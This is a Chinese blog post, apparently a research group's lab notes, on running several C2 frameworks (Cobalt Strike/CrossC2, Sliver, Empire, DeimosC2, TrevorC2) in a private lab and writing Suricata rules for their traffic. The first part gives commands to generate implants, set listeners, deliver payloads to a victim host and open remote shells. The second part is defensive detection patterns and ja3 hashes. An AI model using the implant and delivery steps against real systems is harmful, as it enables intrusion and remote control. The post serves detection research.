【组内工作】木马回联

已于 2023-09-21 10:41:59 修改
阅读量1k 收藏 1
点赞数
分类专栏: 组内工作-研究方向 文章标签: 木马回联
于 2023-07-28 10:07:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dajian1040556534/article/details/131300734
版权

文章目录

C2服务器安装和运行方法

CrossC2运行方法

注意:这个只能是服务器和攻击者是同一台主机才能运行,即都是192.168.230.137

cs服务器:192.168.230.137(kali)
攻击者:192.168.230.137(kali)
受害者:192.168.230.143(windows 10)

  • 在cs服务器192.168.230.137上:

    1. 打开一个终端,输入:
      sudo su
      ./teamserver 192.168.230.137 123456

  • 在攻击者192.168.230.137上:

    1. 再打开一个终端,输入:
      ./cobaltstrike

    2. 设置监听器,https的

    3. 导入插件,cna文件

    4. 生成payload

    5. 将生成的恶意文件(两个,一个是lib,一个是out)放到受害者主机上

  • 在受害者192.168.230.143上:
    ./t_cc2.out

  • 在攻击者192.168.230.137上运行wireshark即可,过滤条件ip.addr==192.168.230.143

sliver运行方法

cs服务器:192.168.230.137
攻击者:192.168.230.138
受害者:192.168.230.143

  • 在cs服务器192.168.230.137上:
    ./sliver-server_linux
    new-operator --name qinjian --lhost 192.168.230.137 //只用执行第一次
    multiplayer

  • 在攻击者192.168.230.138上:
    将cs服务器192.168.230.137上生成的文件放到与sliver-client_linux同目录下
    ./sliver-client_linux import qinjian_192.168.230.137.cfg //只用执行第一次
    ./sliver-client_linux

  • 接下来,无论在cs服务器或者攻击者上都可以,执行以下命令:
    generate --mtls 192.168.230.137 --save test.exe --os Windows //生成shell
    mtls //开启mtls协议监听
    implants //查看生成过的shell
    jobs //查看进程

  • 将生成的shell文件test.exe放到windows受害者上,并运行
    双击test.exe

  • 接下来,无论在cs服务器或者攻击者上都可以,执行以下命令:
    sessions //查看会话
    sessions -i id //进入会话 sessions -k id //结束会话
    shell --shell-path "C:\\windows\system32\cmd.exe" //进入交互式shell
    exit //退出

  • 在攻击者192.168.230.138上开启wireshark抓包,过滤条件ip.addr==192.168.230.143

empire安装方法

注意这里cs服务器和攻击者是同一台机器

cs服务器:192.168.230.138
攻击者:192.168.230.138
受害者:192.168.230.143

  • 在cs服务器192.168.230.138上运行:
    ./ps-empire server

  • 在攻击者192.168.230.138上运行:
    ./ps-empire client

  • 设置监听器:
    uselistener [tap键选择监听器类型]
    set Name [监听器名称]
    set Port [端口号]
    execute
    listeners //查看设置的监听器
    kill [监听器Name] //删除监听器

  • 设置后门:
    usestager [tap键选择后门类型]
    set Listener [监听器Name]
    set OutFile [后门文件,例如launcher.bat] //可写可不写,默认就是set OutFile launcher.bat
    execute

  • 将launcher.bat放到/var/www/html目录下,然后让受害者192.168.230.143访问该文件

  • 在攻击者192.168.230.138上运行:
    agents //查看获取的代理会话
    shell whoami //执行命令

DeimosC2安装教程

cs服务器:192.168.230.137
攻击者:192.168.230.138
受害者:192.168.230.143

  • cs服务器上运行:
    ./DeimosC2

  • 攻击者上:
    登录https://192.168.230.137:8443
    用户名:qinjian
    密码:qinjian1030
    add listener – 地址设为192.168.230.137
    下载对应操作系统的agents,下载的位置可以从浏览器的右上角的下载标志找到

  • 受害者上:
    运行下载的agents

TrevorC2安装教程:

cs服务器:192.168.230.137
攻击者:192.168.230.138
受害者:192.168.230.143

sudo su
conda create -n py37 python=3.7(只第一次需要运行)
conda activate py37

Havoc安装教程:

https://hub.nuaa.cf/HavocFramework/Havoc/blob/main/WIKI.MD

Covenant安装教程:

https://hub.nuaa.cf/cobbr/Covenant/wiki/Installation-And-Startup

Merlin安装教程:

https://hub.nuaa.cf/Ne0nd0g/merlin

pupy安装教程

https://hub.nuaa.cf/n1nj4sec/pupy

NimPlant安装教程:

https://hub.nuaa.cf/chvancooten/NimPlant

  • 在cs服务器上运行:
    目录:SecistSploit
    sudo su
    conda activate py37
    python SSF.py
    use listener/trevorc2
    show options
    set lhost [本机ip] // 设置当前ip
    set target 2 // 设置生成的agent文件的类型,有三种1->C# 2->powershell 3->python
    run // 生成agent文件

    list // 查看受害者主机
    interact 1 // 与受害者主机交互

  • 在受害者上运行生成的agent文件

C2服务器的流量特征

CrossC2

1. 心跳包

在这里插入图片描述
suricata规则:
自己想的:alert tcp any any -> any any (msg:"Heartbeat Extension Detected"; flow:established; tls.handshake.type: 1; tls.handshake.extensions["heartbeat"]; content:"|00 0F 00 01 01|"; depth:5;sid:100001; rev:1; )

实际用的:alert tcp any any -> any any (msg:"Heartbeat Extension Detected";flow:established;content:"|00 0F 00 01 01|";sid:100001;rev:1;)

2. 命令

  1. 执行命令时与平时的心跳包不太一样,会多传一些数据:
    在这里插入图片描述

  2. 并且加密数据是以00 00 00 00 00 00 00 02开头的
    在这里插入图片描述

    suricata规则:alert tls any any -> any any (msg:"Detect HTTPS Application Data with 0000000000000002";content: "|00 00 00 00 00 00 00 02|";flow:established; sid:100002; rev:1;)

3. ja3/ja3s

ja3:alert tls any any -> any any(msg:"CorssC2 https ja3";ja3.hash;content:"fd80fa9c6120cdeea8520510f3c644ac";classtype:misc-activity;sid:1001;rev:1)

ja3s:alert tls any any <> any any(msg:"CorssC2 https ja3s";ja3s.hash;content:"b7bd51222a09f3ad66a340710ae9c01a";sid:1002)

Sliver

1. http

  • 独特的头部特定标识 / 特定的请求响应模式(html)

    观察sliver的源码发现,Sliver的C2木马连接服务端有5种类型的消息,使用内置路径段随机生成请求路径,所有路径将具有以下扩展名之一,不同的文件扩展名指示了请求的类型。除了扩展名之外,路径中的所有内容都会被服务器忽略。

    • .woff = Stagers(默认不使用)
    • .js = Long poll messages(长消息轮询,加密交互数据)
    • .html = Key exchange messages (密钥交换,set-cookie)
    • .php = Session messages
    • .png = Close session messages(关闭会话)

    随机路径生成的方法:
    在这里插入图片描述
    请求包的特征:

    1. 方法:POST/GET
    2. path为各个后缀所对应的字符串列表中多个字符串的组合:StagerPaths、PollPaths、SessionPaths、ClosePaths
    3. 文件名为各个后缀所对应的字符串列表其中之一的字符串:StagerFiles、PollFiles、SessionFiles、CloseFiles
    4. 文件后缀:.woff、.js、.html、.php、.png
    5. 参数名称为NonceQueryArgs: “abcdefghijklmnopqrstuvwxyz_”,从这些字符串中选择1-2个
    6. nonce值的长度为1到10位,包含数字和小写字母与下划线。

    综上,写出的suricata规则为:

    .woffalert tcp any any -> any any (msg: "Sliver HTTP woff request"; flow:to_server,established;content:".woff";http_uri;pcre: "/\/(static|assets|fonts|locales)(.*?)((attribute_text_w01_regular|ZillaSlab-Regular\.subset\.bbc33fb47cf6|ZillaSlab-Bold\.subset\.e96c15f68c68|Inter-Regular|Inter-Medium)\.woff)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000001;classtype:trojan-activity; rev:1;)

    .jsalert tcp any any -> any any (msg: "Sliver HTTP js request"; flow:to_server,established;content:"GET";http_method;nocase;content:".js";http_uri;pcre: "/\/(js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript)(.*?)((bootstrap|bootstrap.min|jquery.min|jquery|route|app|app.min|array|backbone|script|email)\.js)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000002;classtype:trojan-activity; rev:1;)

    .htmlalert tcp any any -> any any (msg: "Sliver HTTP html request&getsessionID"; flow:to_server,established;content:"POST";http_method;nocase;content:".html";http_uri;pcre: "/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.html)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000003;flowbits:set,name;flowbits:noalert;classtype:trojan-activity; rev:1;)

    .htmlalert tcp any any <> any any (msg: "Sliver HTTP html response&set-cookie";flow:to_client,established;content:"Set-Cookie";http_header;pcre:"/^Set-Cookie\:\s*(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)\=[a-z0-9]{32}\;\s*HttpOnly$/i";sid:1000004;flowbits:isset,name;classtype:trojan-activity;)

    .phpalert tcp any any -> any any (msg: "Sliver HTTP php request"; flow:to_server,established;content:"POST";http_method;nocase;content:".php";http_uri;pcre: "/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.php)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000005;classtype:trojan-activity; rev:1;)

    .pngalert tcp any any -> any any (msg: "Sliver HTTP png request"; flow:to_server,established;content:".png";http_uri;pcre: "/\/(static|www|assets|images|icons|image|icon|png)(.*?)((favicon|sample|example)\.png)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000006;classtype:trojan-activity; rev:1;)

2. https

  • ja3(s)加密指纹特征:

    ja3:Alert tls any any -> any any(msg:"sliver https debian";ja3.hash;content:"19e29534fd49dd27d09234e639c4057e";classtype:misc-activity;sid:1001;rev:1)

    ja3s:Alert tls any any <> any any(msg:"sliver https";ja3s.hash;content:"f4febc55ea12b31ae17cfb7e614afda8";sid:1002)

empire

http

https

DeimosC2

https

  • tls版本1.2/1.3
    在这里插入图片描述

  • https端口号:C2服务器默认为4443(不过可以修改)

  • ja3(s)加密指纹特征
    ja3:Alert tls any any -> any any(msg:"sliver https debian";ja3.hash;content:"e564ee1b7bcae4467d8c759df910ed9c";classtype:misc-activity;sid:1001;rev:1)
    ja3s:Alert tls any any <> any any(msg:"sliver https";ja3s.hash;content:"f4febc55ea12b31ae17cfb7e614afda8";sid:1002)(和sliver一样)
    在这里插入图片描述
    在这里插入图片描述

TrevorC2

  • 心跳包:http(服务器主机返回的http相应包会包含非常多的payload,且Reassembled TCP length: 386861)
    在这里插入图片描述
    在这里插入图片描述

  • 受害者主机端口号每次发送一个http请求,就更换一个端口,端口号逐次+1
    在这里插入图片描述
    在这里插入图片描述
    Suricata规则:alert tcp any any -> any any (msg:"HTTP Request Source Port Sequential Increase"; flow:established, to_server; content:"GET"; http_method; pcre:"/^Host:[^\r\n]+\r\n/"; lua:check_port.lua; sid:100001; rev:1;)
    check_port.lua代码:

    function init(args)
    -- 这里可以执行一些初始化操作

    local rules = {}
    return rules
end

function check_port(pkt, data)
    if not pkt.is_http or not pkt.is_request then
        return 0
    end

    local src_port = pkt.src_port
    local prev_src_port = pkt.prev_pkt.src_port

    if src_port ~= prev_src_port + 1 then
        return 1
    end

    return 0
end

  • 交互发送命令,受害者主机会发送一个url为:/images?guid=xxxx,xxxx类似于base64编码,最后会用=填充(有时候能用base64解码,有时候不能,而且解出来的编码也很像base64编码)
    在这里插入图片描述
    Suricata规则:alert tcp any any -> any any (msg: "TrevorC2 interact"; flow:to_server,established;content:"/images?guid=";http_uri;pcre: "/\/images\?guid=[A-za-z0-9+\/=](.*)/i";sid:1000002;classtype:trojan-activity; rev:1;)

过动猿
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
僵尸木马
yes_angel的博客
07-20 4177
今天得知我被调到移动去做僵尸木马的安全处理,搜罗了一些文章,希望有用 应当看到,由于僵尸网络日益复杂并难于检测,使得许多单位并没有完全认识到僵尸网络的造成的危害,甚至有点儿沾沾自喜,总觉得僵尸网络离自己的单位很远。他们不相信这种网络攻击真得会阻止对站点的访问,不相信成千上万的计算机会成为网络僵尸。其实,僵尸网络早已“女大十八变”,它已经成为网络钓鱼、传播垃圾邮件和色情文学、实施点击欺诈和经济
木马与病毒
03-26
病毒则是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 木马和病毒的主要区别在于自传播性,病毒具有自我复制的能力,而木马则不具备...
木马连接原理
huangmingzhong的专栏
09-22 723
目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马   正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他机器上开的端口   由于到现在,宽带上网(动态IP)和路由器的普遍,这个软件就有很大的不足   动态IP:每次拨号,IP都会跟换.所以,就算对方中了木马,在下次拨号的时候,我们会因为找不到IP而丢肉鸡
实战 | 记某次攻防演练钓鱼专项
zkaqlaoniao的博客
12-14 369
由客户授权,组织一场钓鱼攻防演练专项,以此来提高员工安全意识。本次演练通过自搭邮件服务器以及搭建钓鱼平台Gophish来完成,通过附件携带木马以及制作钓鱼页面来骗取敏感信息两个角度来进行测试,最后效果不错,完美收工,且听我娓娓道来。在收到钓鱼邮件/短信时,大多数是抱着好奇的心态进行点击链接,然后跳转到钓鱼页面,输入个人信息,导致个人信息造成泄露。
DeimosC2:一款现代、可扩展的命令与控制框架
最新发布
gitblog_00027的博客
04-09 313
DeimosC2:一款现代、可扩展的命令与控制框架 项目地址:https://gitcode.com/DeimosC2/DeimosC2 DeimosC2 是一个开源的、跨平台的、模块化的命令与控制(Command & Control, C&C)框架,专为安全研究人员和渗透测试人员设计。它提供了高度定制化的能力,以适应各种复杂的网络环境和任务需求。 项目简介 在网络安全领域,C&a...
学习笔记-sliver
人饭子的博客
11-03 274
sliver 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 项目地址 https://github.com/BishopFox/sliver 使用文档 https://github.com/BishopFox/sliver/wiki 相关文章 sliver c2代码的学习 安装 官方一条命令版 # 安装 curl...
jQuery旋转木马特效
06-10
可以使用懒加载技术,只加载当前可视区域内的图片,或者使用更高效的图片格式如WebP来减小文件大小。 8. **响应式设计**:随着移动设备的普及,旋转木马需要适应不同的屏幕尺寸。通过媒体查询和百分比布局,可以...
特效图片木马旋转显示
12-28
"特效图片木马旋转显示"这个主题涉及到利用这两种技术创建动态视觉效果,同时可能结合了恶意软件的元素。以下是关于这个主题的详细知识点: 首先,HTML5是超文本标记语言的最新版本,它提供了丰富的功能和API,如...
防御php木马.zip
01-05
这通常涉及到修改Apache的配置文件,如httpd.conf,设置安全的用户和组,以及限制ServerRoot和Directory指令的范围。 其次,防止PHP木马执行shell是另一个至关重要的环节。"防止php木马执行webshell.txt" 文件可能...
一键关闭有害木马端口的bat脚本
05-15
一键关闭有害木马端口的bat脚本
DeimosC2:DeimosC2是用于后期开发的Golang命令和控制框架
03-18
DeimosC2 Deimos在: Beta DeimosC2是开发后的命令与控制(C2)工具,它利用多种通信方法来控制受到威胁的计算机。 DeimosC2服务器和代理可在Windows,Darwin和Linux上运行并经过测试。它完全用编写,而前端则用编写。 侦听器功能 每个侦听器都有自己的RSA Pub和私有密钥,可用于包装加密的代理通信。 动态生成代理 侦听器和与之绑定的代理的图形化地图 代理功能 代理列表页面提供高级概述 代理交互页面,其中包含代理信息,针对代理运行作业的能力,文件浏览器,战利品数据以及添加注释的能力 支持的代理商 TCP协议 HTTPS DoH(HTTPS上的DNS) QUIC 通过TCP进行数据透视 前端功能 具有管理员和用户角色的多用户支持 与听众和座席的图和视觉交互 密码长度要求 使用Google MFA进行2FA身份验证 Websocket API
地址:地址是一个Go库,可使用Google地址数据服务生成的数据来验证地址并设置地址格式
02-24
地址 地址是一个Go库,它使用生成的数据来验证地址并设置地址格式。 安装 使用Go模块安装库。 例如: go get -u github.com/Boostport/address 。 创建地址 要创建一个新地址,请使用New() 。 如果地址无效,将返错误。 package main import ( "log" "github.com/Boostport/address" "github.com/hashicorp/go-multierror" ) func main () { addr , err := address . NewValid ( address . WithCountry ( "AU" ), // Must be an ISO 3166-1 country code address . WithName ( "John Citizen" ),
透视密码,针对*号的密码显示方式进行透视。
08-17
透视密码,针对*号的密码显示方式进行透视。透视密码,针对*号的密码显示方式进行透视。透视密码,针对*号的密码显示方式进行透视。透视密码,针对*号的密码显示方式进行透视。
Go-exec一个golang包用于与一个在后台运行的进程进行交互
08-13
exec一个golang包用于与一个在后台运行的进程进行交互
木马行为分析技术
03-09
木马行为分析技术,关于常见木马的行为分析,如何防御,对于做网络安全的有帮助
C2远控之初探shellcode
qq_29948489的博客
02-20 1118
杀软一般通过一下几点来检测恶意软件和行为:1、静态查杀:最基本的查杀方式,主要通过对文件的特征码进行扫描,匹配已知的病毒特征库。如果发现文件特征码与病毒特征库中的某个病毒特征码相匹配,就判断该文件为病毒;部分杀软会在静态查杀时将程序放入沙箱中运行几秒的方式以检测程序是否是恶意程序。2、动态(主动)查杀:通过在程序运行时扫描程序内存是否匹配病毒特征的方式主动发现恶意程序。在EDR中还会挂钩敏感的Windows API,在程序调用到被挂钩的API时检查函数参数和调用栈以检测恶意程序。
Suricata 规则classtype和规则文件分类说明
u011311291的博客
01-09 5217
文件名为:classification.config config classification: not-suspicious,Not Suspicious Traffic,3 #不可疑的流量? config classification: unknown,Unknown Traffic,3 #未知流量 config classification: bad-unknown,Potentially...
4.3 木马隐藏分析
qq_55202378的博客
07-28 2930
木马隐藏
安装pymysql显示木马怎么
07-20
安装pymysql时出现木马警报的情况可能有以下几种可能性: 1. 误报:有些杀毒软件会将某些文件或行为误判为木马,特别是对于一些编程语言的库文件。你可以尝试关闭杀毒软件,然后重新安装pymysql,看是否还会出现警报。 2. 下载源问题:确保你从官方可信的渠道下载pymysql,例如在官方网站或PyPI(Python Package Index)上下载,以避免下载到被篡改的或包含恶意代码的文件。 3. 系统安全问题:如果你的系统存在安全漏洞或被感染,杀毒软件可能会对一些常见的库文件进行警报。这种情况下,你需要进行系统安全扫描和修复。 如果你能提供更多细节,例如具体的警报信息和你所使用的杀毒软件,我可以给出更具体的建议。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值